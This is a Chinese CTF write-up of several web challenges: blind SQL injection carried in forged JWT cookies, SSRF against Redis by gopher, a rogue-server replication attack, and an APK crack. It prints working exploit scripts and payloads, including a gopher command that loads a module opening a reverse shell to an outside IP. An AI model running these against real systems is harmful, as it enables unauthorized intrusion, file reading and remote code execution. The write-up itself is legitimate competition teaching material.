网鼎杯玄武组部分web题解
网鼎杯玄武组部分web题解
作者:Mr.zhang合天智汇
查看JS,在JS中找到p14.php,直接copy下来console执行,输入战队的token就可以了
js_on
顺手输入一个 admin admin,看到下面的信息
欢迎admin
这里是你的信息:key:xRt*YMDqyCCxYxi9a@LgcGpnmM2X8ia>elect/**/ga>roup_cona>cat(sca>hema_name)/**/fra>om/**/infoa>rmation_sca>hema.Sa>CHEMATA),{},1))>{}#"
# payloadTmpl = "i'/**/or/**/ascii(mid((sa>elect/**/ga>roup_cona>cat(taa>ble_name)/**/fra>om/**/infoa>rmation_sca>hema.ta>ables/**/whera>e/**/taa>ble_sa>chema=data>abase()),{},1))>{}#"
# payloadTmpl = "i'/**/or/**/ascii(mid((sa>elect/**/ga>roup_cona>cat(cola>umn_name)/**/fra>om/**/infoa>rmation_sca>hema.ca>olumns/**/whera>e/**/taa>ble_sa>chema=data>abase()),{},1))>{}#"
payloadTmpl = "i'/**/or/**/ascii(mid((sea>lect/**/loa>ad_fia>le('/fla>ag')),{},1))>{}#"
def half_interval():
result = ""
for i in range(1,45):
min = 32
max = 127
while abs(max-min) > 1:
mid = (min + max)//2
payload = payloadTmpl.format(i,mid)
jwttoken = {
"user": payload,
"news": "success"
}
payload = jwt.encode(jwttoken, key, algorithm='HS256').decode("ascii")
# print(payload)
cookies = dict(token=str(payload))
res = requests.get(url,cookies=cookies,proxies=proxies)
if re.findall("success", res.text) != []:
min = mid
else:
max = mid
result += chr(max)
print(result)
if __name__ == "__main__":
half_interval()
# payload = payloadTmpl.format(1,32)
# jwttoken = {
# "user": payload,
# "news": "success"
# }
# print(jwttoken)
# payload = jwt.encode(jwttoken, key, algorithm='HS256').decode("ascii")
# print(payload)
# cookies = dict(token=str(payload))
# res = requests.get(url,cookies=cookies,proxies=proxies)
# res.encoding='utf-8'
# print(res.text)
ssrfme
刚拿到题目,想起来跟 SECCON 的题目很像,直接DNS重绑定绕过第一步
获取到hint的源码,提示ssrf 打 redis,直接写contrab在save的时候提示没权限,写shell不知道路径
一直主从复制也没成功
很坑,没权限
后来检查一下发现目录不对,转移到有权限的/tmp 下面
gopher://ctf.m0te.top:6379/_auth%2520welcometowangdingbeissrfme6379%250d%250aconfig%2520set%2520dir%2520/tmp/%250d%250aquit
然后重复主从的步骤,在自己的VPS上起好了 rogue 服务器
gopher://ctf.m0te.top:6379/_auth%2520welcometowangdingbeissrfme6379%250d%250aconfig%2520set%2520dbfilename%2520exp.so%250d%250aslaveof%252039.107.68.253%252060001%250d%250aquit
服务器监听
gopher://ctf.m0te.top:6379/_auth%2520welcometowangdingbeissrfme6379%250d%250amodule%2520load%2520/tmp/exp.so%250d%250asystem.rev%252039.107.68.253%252060003%250d%250aquit
rogue.py
import socketimport time
CRLF="\r\n"
payload=open("exp.so","rb").read()
exp_filename="exp.so"
def redis_format(arr):
global CRLF
global payload
redis_arr=arr.split(" ")
cmd=""
cmd+="*"+str(len(redis_arr))
for x in redis_arr:
cmd+=CRLF+"$"+str(len(x))+CRLF+x
cmd+=CRLF
return cmd
def redis_connect(rhost,rport):
sock=socket.socket()
sock.connect((rhost,rport))
return sock
def send(sock,cmd):
sock.send(redis_format(cmd))
print(sock.recv(1024).decode("utf-8"))
def interact_shell(sock):
flag=True
try:
while flag:
shell=raw_input("\033[1;32;40m[*]\033[0m ")
shell=shell.replace(" ","${IFS}")
if shell=="exit" or shell=="quit":
flag=False
else:
send(sock,"system.exec {}".format(shell))
except KeyboardInterrupt:
return
def RogueServer(lport):
global CRLF
global payload
flag=True
result=""
sock=socket.socket()
sock.bind(("0.0.0.0",lport))
sock.listen(10)
clientSock, address = sock.accept()
while flag:
data = clientSock.recv(1024)
if "PING" in data:
result="+PONG"+CRLF
clientSock.send(result)
flag=True
elif "REPLCONF" in data:
result="+OK"+CRLF
clientSock.send(result)
flag=True
elif "PSYNC" in data or "SYNC" in data:
result = "+FULLRESYNC " + "a" * 40 + " 1" + CRLF
result += "$" + str(len(payload)) + CRLF
result = result.encode()
result += payload
result += CRLF
clientSock.send(result)
flag=False
if __name__=="__main__":
lhost="xxx.xxx.xxx.xxx"
lport=60001
java
用 jadx 对 java.apk 反汇编
主程序逻辑并不复杂,正常的输入,以及将输入进行计算后比对
先对用户输入进行 AES 加密 ,Key 为 aes_check_key!@#,然后进行两次异或,最后 base64 编码
与 VsBDJCvuhD65/+sL+Hlf587nWuIa2MPcqZaq7GMVWI0Vx8l9R42PXWbhCRftoFB3进行比较
所以 crack 过程也很简单,逆回来就得到输入,但是中间卡在密钥并不是直接给的密钥,还对密钥里 'e' 和 'o'进行了替换,最终密钥为 aos_chock_koy!@#,逆回去得到flag
实验推荐
SSRF漏洞进阶实践-攻击内网Redis
http://hetianlab.com/expc.do?ec=ECID9f92-ff93-4a94-a821-f0b968ef4985
声明:笔者初衷用于分享与普及网络知识,若读者因此作出任何危害网络安全行为后果自负,与合天智汇及原作者无关!